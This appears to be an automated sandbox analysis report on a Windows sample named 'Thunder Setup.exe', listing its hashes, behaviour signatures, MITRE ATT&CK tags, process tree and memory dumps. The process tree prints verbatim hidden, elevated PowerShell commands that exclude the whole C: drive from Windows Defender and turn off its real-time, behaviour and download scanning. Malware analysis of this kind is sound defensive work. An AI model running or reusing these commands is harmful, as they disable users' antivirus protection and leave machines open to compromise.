8e3247579c4f432a90f1822f5151c6dc2836f7962d840a439fae8c6c8a76d294

Resubmissions

14/07/2024, 22:14

240714-15wd4sxcrg 8

14/07/2024, 16:06

240714-tj3gzaxdrn 8

Analysis

max time kernel
122s
max time network
131s
platform
windows7_x64
resource
win7-20240708-en
resource tags

arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system
submitted
14/07/2024, 16:06

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Thunder Setup.exe
Size

78KB
MD5

1eb797341e423c83060a36b92c720cc9
SHA1

380828212f0bb9a82d568491247a590a316e4351
SHA256

0842a46a5113b1ff571e62101c556565c853a0c0c792f7fdde57eb40e0256177
SHA512

9115d3a22f0163747de035273cd44caa84c46e17cd3fee863172e35688455def25e07bdbf7bdcec940dfd8bd2da7eb10e360d7f5a9413efc8c4b61ad4605c19b
SSDEEP

1536:aZ2FWSNhd/4131izmvch6oKnLzx9QAkhHQ40Gp/VS6:A2ddQ131izLh6oqLzHHuHQ40Gp/VT

Score

8^/10

execution

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 9 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
332	Powershell.exe
1340	Powershell.exe
1712	Powershell.exe
700	Powershell.exe
1340	Powershell.exe
1532	powershell.exe
1624	powershell.exe
1780	powershell.exe
1284	powershell.exe

Suspicious behavior: EnumeratesProcesses 16 IoCs

pid	Process
1340	Powershell.exe
1712	Powershell.exe
700	Powershell.exe
332	Powershell.exe
700	Powershell.exe
700	Powershell.exe
1712	Powershell.exe
1712	Powershell.exe
332	Powershell.exe
332	Powershell.exe
1340	Powershell.exe
1340	Powershell.exe
1780	powershell.exe
1284	powershell.exe
1624	powershell.exe
1532	powershell.exe

Suspicious use of AdjustPrivilegeToken 8 IoCs

description	pid	Process
Token: SeDebugPrivilege	1340	Powershell.exe
Token: SeDebugPrivilege	1712	Powershell.exe
Token: SeDebugPrivilege	332	Powershell.exe
Token: SeDebugPrivilege	700	Powershell.exe
Token: SeDebugPrivilege	1780	powershell.exe
Token: SeDebugPrivilege	1284	powershell.exe
Token: SeDebugPrivilege	1624	powershell.exe
Token: SeDebugPrivilege	1532	powershell.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
2692	javaw.exe

Suspicious use of WriteProcessMemory 63 IoCs

description	pid	Process	procid_target
PID 1956 wrote to memory of 2692	1956	Thunder Setup.exe	30
PID 1956 wrote to memory of 2692	1956	Thunder Setup.exe	30
PID 1956 wrote to memory of 2692	1956	Thunder Setup.exe	30
PID 1956 wrote to memory of 2692	1956	Thunder Setup.exe	30
PID 1956 wrote to memory of 2692	1956	Thunder Setup.exe	30
PID 1956 wrote to memory of 2692	1956	Thunder Setup.exe	30
PID 1956 wrote to memory of 2692	1956	Thunder Setup.exe	30
PID 2692 wrote to memory of 1340	2692	javaw.exe	31
PID 2692 wrote to memory of 1340	2692	javaw.exe	31
PID 2692 wrote to memory of 1340	2692	javaw.exe	31
PID 2692 wrote to memory of 1340	2692	javaw.exe	31
PID 2692 wrote to memory of 1340	2692	javaw.exe	31
PID 2692 wrote to memory of 1340	2692	javaw.exe	31
PID 2692 wrote to memory of 1340	2692	javaw.exe	31
PID 2692 wrote to memory of 1712	2692	javaw.exe	32
PID 2692 wrote to memory of 1712	2692	javaw.exe	32
PID 2692 wrote to memory of 1712	2692	javaw.exe	32
PID 2692 wrote to memory of 1712	2692	javaw.exe	32
PID 2692 wrote to memory of 1712	2692	javaw.exe	32
PID 2692 wrote to memory of 1712	2692	javaw.exe	32
PID 2692 wrote to memory of 1712	2692	javaw.exe	32
PID 2692 wrote to memory of 700	2692	javaw.exe	34
PID 2692 wrote to memory of 700	2692	javaw.exe	34
PID 2692 wrote to memory of 700	2692	javaw.exe	34
PID 2692 wrote to memory of 700	2692	javaw.exe	34
PID 2692 wrote to memory of 700	2692	javaw.exe	34
PID 2692 wrote to memory of 700	2692	javaw.exe	34
PID 2692 wrote to memory of 700	2692	javaw.exe	34
PID 2692 wrote to memory of 332	2692	javaw.exe	35
PID 2692 wrote to memory of 332	2692	javaw.exe	35
PID 2692 wrote to memory of 332	2692	javaw.exe	35
PID 2692 wrote to memory of 332	2692	javaw.exe	35
PID 2692 wrote to memory of 332	2692	javaw.exe	35
PID 2692 wrote to memory of 332	2692	javaw.exe	35
PID 2692 wrote to memory of 332	2692	javaw.exe	35
PID 332 wrote to memory of 1624	332	Powershell.exe	39
PID 332 wrote to memory of 1624	332	Powershell.exe	39
PID 332 wrote to memory of 1624	332	Powershell.exe	39
PID 332 wrote to memory of 1624	332	Powershell.exe	39
PID 332 wrote to memory of 1624	332	Powershell.exe	39
PID 332 wrote to memory of 1624	332	Powershell.exe	39
PID 332 wrote to memory of 1624	332	Powershell.exe	39
PID 1340 wrote to memory of 1532	1340	Powershell.exe	41
PID 1340 wrote to memory of 1532	1340	Powershell.exe	41
PID 1340 wrote to memory of 1532	1340	Powershell.exe	41
PID 1340 wrote to memory of 1532	1340	Powershell.exe	41
PID 1340 wrote to memory of 1532	1340	Powershell.exe	41
PID 1340 wrote to memory of 1532	1340	Powershell.exe	41
PID 1340 wrote to memory of 1532	1340	Powershell.exe	41
PID 700 wrote to memory of 1780	700	Powershell.exe	42
PID 700 wrote to memory of 1780	700	Powershell.exe	42
PID 700 wrote to memory of 1780	700	Powershell.exe	42
PID 700 wrote to memory of 1780	700	Powershell.exe	42
PID 700 wrote to memory of 1780	700	Powershell.exe	42
PID 700 wrote to memory of 1780	700	Powershell.exe	42
PID 700 wrote to memory of 1780	700	Powershell.exe	42
PID 1712 wrote to memory of 1284	1712	Powershell.exe	40
PID 1712 wrote to memory of 1284	1712	Powershell.exe	40
PID 1712 wrote to memory of 1284	1712	Powershell.exe	40
PID 1712 wrote to memory of 1284	1712	Powershell.exe	40
PID 1712 wrote to memory of 1284	1712	Powershell.exe	40
PID 1712 wrote to memory of 1284	1712	Powershell.exe	40
PID 1712 wrote to memory of 1284	1712	Powershell.exe	40

C:\Users\Admin\AppData\Local\Temp\Thunder Setup.exe
"C:\Users\Admin\AppData\Local\Temp\Thunder Setup.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1956
- C:\Users\Admin\AppData\Local\Temp\jre\bin\javaw.exe
  "C:\Users\Admin\AppData\Local\Temp\jre\bin\javaw.exe" -Dfile.encoding=UTF-8 -classpath "lib\.;lib\..;lib\activation.jar;lib\antlr4-runtime.jar;lib\asm-all.jar;lib\commons-email.jar;lib\connector-api.jar;lib\dn-compiled-module.jar;lib\dn-php-sdk.jar;lib\dyn4j.jar;lib\gson.jar;lib\HikariCP-java6.jar;lib\javassist-GA.jar;lib\jaybird-jdk18.jar;lib\jfoenix.jar;lib\jkeymaster.jar;lib\jna.jar;lib\jphp-app-framework.jar;lib\jphp-core.jar;lib\jphp-desktop-ext.jar;lib\jphp-desktop-hotkey-ext.jar;lib\jphp-game-ext.jar;lib\jphp-gui-ext.jar;lib\jphp-gui-jfoenix-ext.jar;lib\jphp-json-ext.jar;lib\jphp-jsoup-ext.jar;lib\jphp-mail-ext.jar;lib\jphp-runtime.jar;lib\jphp-sql-ext.jar;lib\jphp-systemtray-ext.jar;lib\jphp-xml-ext.jar;lib\jphp-zend-ext.jar;lib\jphp-zip-ext.jar;lib\jsoup.jar;lib\mail.jar;lib\mysql-connector-java.jar;lib\postgresql.jre7.jar;lib\slf4j-api.jar;lib\slf4j-simple.jar;lib\sqlite-jdbc.jar;lib\zt-zip.jar" org.develnext.jphp.ext.javafx.FXLauncher
  2⤵
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID:2692
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe
    Powershell.exe -Command "& {Start-Process Powershell.exe -WindowStyle hidden -ArgumentList '-Command Add-MpPreference -Force -ExclusionPath C:\' -Verb RunAs}"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:1340
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -Force -ExclusionPath C:\
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1532
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe
    Powershell.exe -Command "& {Start-Process Powershell.exe -WindowStyle hidden -ArgumentList '-Command Set-MpPreference -Force -DisableBehaviorMonitoring ' -Verb RunAs}"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:1712
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Set-MpPreference -Force -DisableBehaviorMonitoring
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1284
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe
    Powershell.exe -Command "& {Start-Process Powershell.exe -WindowStyle hidden -ArgumentList '-Command Set-MpPreference -Force -DisableIOAVProtection ' -Verb RunAs}"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:700
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Set-MpPreference -Force -DisableIOAVProtection
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1780
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe
    Powershell.exe -Command "& {Start-Process Powershell.exe -WindowStyle hidden -ArgumentList '-Command Set-MpPreference -Force -DisableRealtimeMonitoring ' -Verb RunAs}"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:332
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Set-MpPreference -Force -DisableRealtimeMonitoring
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1624

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
abe27ad8054b8669e06efdae1d666603

SHA1
b7bbb8e0f13e49b3f073b5505eef1cbd9a0d667f

SHA256
8b3ee5bee9b19cbfda45c7b1c94cf86f70dca7a73251cd1bf610cd3e4379f260

SHA512
4c5e538673650cf23090836d91b81dbfba35ac8a2f59c33043a290f8269aeda20597b76febbc00db8af38f872cb2f4e3e86c3abd476abcf33d7aba506dcc9c6a

Download Submit
memory/1956-0-0x0000000000400000-0x0000000000420000-memory.dmp

Filesize
128KB

Download
memory/2692-6-0x0000000002880000-0x00000000028A8000-memory.dmp

Filesize
160KB

Download
memory/2692-12-0x00000000028C8000-0x00000000028D0000-memory.dmp

Filesize
32KB

Download
memory/2692-13-0x00000000028D0000-0x00000000028D8000-memory.dmp

Filesize
32KB

Download
memory/2692-28-0x0000000002920000-0x0000000002928000-memory.dmp

Filesize
32KB

Download
memory/2692-27-0x0000000002918000-0x0000000002920000-memory.dmp

Filesize
32KB

Download
memory/2692-32-0x00000000028B8000-0x00000000028C0000-memory.dmp

Filesize
32KB

Download
memory/2692-31-0x00000000028C0000-0x00000000028C8000-memory.dmp

Filesize
32KB

Download
memory/2692-34-0x0000000002928000-0x0000000002930000-memory.dmp

Filesize
32KB

Download
memory/2692-37-0x0000000002930000-0x0000000002938000-memory.dmp

Filesize
32KB

Download
memory/2692-38-0x0000000002938000-0x0000000002940000-memory.dmp

Filesize
32KB

Download
memory/2692-40-0x0000000002940000-0x0000000002948000-memory.dmp

Filesize
32KB

Download
memory/2692-41-0x0000000000190000-0x0000000000191000-memory.dmp

Filesize
4KB

Download
memory/2692-43-0x0000000002948000-0x0000000002950000-memory.dmp

Filesize
32KB

Download
memory/2692-46-0x0000000002950000-0x0000000002958000-memory.dmp

Filesize
32KB

Download
memory/2692-45-0x0000000002880000-0x00000000028A8000-memory.dmp

Filesize
160KB

Download
memory/2692-48-0x0000000000190000-0x0000000000191000-memory.dmp

Filesize
4KB

Download
memory/2692-52-0x0000000002958000-0x0000000002960000-memory.dmp

Filesize
32KB

Download
memory/2692-51-0x00000000028C8000-0x00000000028D0000-memory.dmp

Filesize
32KB

Download
memory/2692-56-0x0000000002960000-0x0000000002968000-memory.dmp

Filesize
32KB

Download
memory/2692-55-0x00000000028D0000-0x00000000028D8000-memory.dmp

Filesize
32KB

Download
memory/2692-60-0x0000000002968000-0x0000000002970000-memory.dmp

Filesize
32KB

Download
memory/2692-59-0x0000000002920000-0x0000000002928000-memory.dmp

Filesize
32KB

Download
memory/2692-58-0x0000000002918000-0x0000000002920000-memory.dmp

Filesize
32KB

Download
memory/2692-64-0x0000000002970000-0x0000000002978000-memory.dmp

Filesize
32KB

Download
memory/2692-63-0x00000000028B8000-0x00000000028C0000-memory.dmp

Filesize
32KB

Download
memory/2692-68-0x0000000002978000-0x0000000002980000-memory.dmp

Filesize
32KB

Download
memory/2692-67-0x0000000002928000-0x0000000002930000-memory.dmp

Filesize
32KB

Download
memory/2692-72-0x0000000002980000-0x0000000002988000-memory.dmp

Filesize
32KB

Download
memory/2692-71-0x0000000002930000-0x0000000002938000-memory.dmp

Filesize
32KB

Download
memory/2692-76-0x0000000002988000-0x0000000002990000-memory.dmp

Filesize
32KB

Download
memory/2692-75-0x0000000002938000-0x0000000002940000-memory.dmp

Filesize
32KB

Download
memory/2692-80-0x0000000002990000-0x0000000002998000-memory.dmp

Filesize
32KB

Download
memory/2692-79-0x0000000002940000-0x0000000002948000-memory.dmp

Filesize
32KB

Download
memory/2692-88-0x0000000002998000-0x00000000029A0000-memory.dmp

Filesize
32KB

Download
memory/2692-87-0x0000000002948000-0x0000000002950000-memory.dmp

Filesize
32KB

Download
memory/2692-91-0x00000000029A0000-0x00000000029A8000-memory.dmp

Filesize
32KB

Download
memory/2692-90-0x0000000002950000-0x0000000002958000-memory.dmp

Filesize
32KB

Download
memory/2692-95-0x00000000029A8000-0x00000000029B0000-memory.dmp

Filesize
32KB

Download
memory/2692-94-0x0000000002958000-0x0000000002960000-memory.dmp

Filesize
32KB

Download
memory/2692-98-0x00000000029B0000-0x00000000029B8000-memory.dmp

Filesize
32KB

Download
memory/2692-97-0x0000000002960000-0x0000000002968000-memory.dmp

Filesize
32KB

Download
memory/2692-106-0x0000000000190000-0x0000000000191000-memory.dmp

Filesize
4KB

Download
memory/2692-111-0x00000000001C0000-0x00000000001CA000-memory.dmp

Filesize
40KB

Download
memory/2692-110-0x00000000001C0000-0x00000000001CA000-memory.dmp

Filesize
40KB

Download
memory/2692-109-0x00000000001C0000-0x00000000001CA000-memory.dmp

Filesize
40KB

Download
memory/2692-108-0x00000000001C0000-0x00000000001CA000-memory.dmp

Filesize
40KB

Download
memory/2692-107-0x0000000002968000-0x0000000002970000-memory.dmp

Filesize
32KB

Download
memory/2692-115-0x0000000000190000-0x0000000000191000-memory.dmp

Filesize
4KB

Download
memory/2692-127-0x0000000000190000-0x0000000000191000-memory.dmp

Filesize
4KB

Download
memory/2692-138-0x0000000002970000-0x0000000002978000-memory.dmp

Filesize
32KB

Download
memory/2692-143-0x0000000000190000-0x0000000000191000-memory.dmp

Filesize
4KB

Download
memory/2692-165-0x0000000002978000-0x0000000002980000-memory.dmp

Filesize
32KB

Download
memory/2692-166-0x0000000000190000-0x0000000000191000-memory.dmp

Filesize
4KB

Download
memory/2692-184-0x0000000002980000-0x0000000002988000-memory.dmp

Filesize
32KB

Download
memory/2692-185-0x0000000002988000-0x0000000002990000-memory.dmp

Filesize
32KB

Download
memory/2692-186-0x0000000002990000-0x0000000002998000-memory.dmp

Filesize
32KB

Download
memory/2692-187-0x0000000002998000-0x00000000029A0000-memory.dmp

Filesize
32KB

Download
memory/2692-188-0x00000000029A0000-0x00000000029A8000-memory.dmp

Filesize
32KB

Download
memory/2692-189-0x00000000029A8000-0x00000000029B0000-memory.dmp

Filesize
32KB

Download
memory/2692-190-0x00000000029B0000-0x00000000029B8000-memory.dmp

Filesize
32KB

Download
memory/2692-191-0x00000000001C0000-0x00000000001CA000-memory.dmp

Filesize
40KB

Download
memory/2692-193-0x00000000001C0000-0x00000000001CA000-memory.dmp

Filesize
40KB

Download
memory/2692-194-0x00000000001C0000-0x00000000001CA000-memory.dmp

Filesize
40KB

Download
memory/2692-192-0x00000000001C0000-0x00000000001CA000-memory.dmp

Filesize
40KB

Download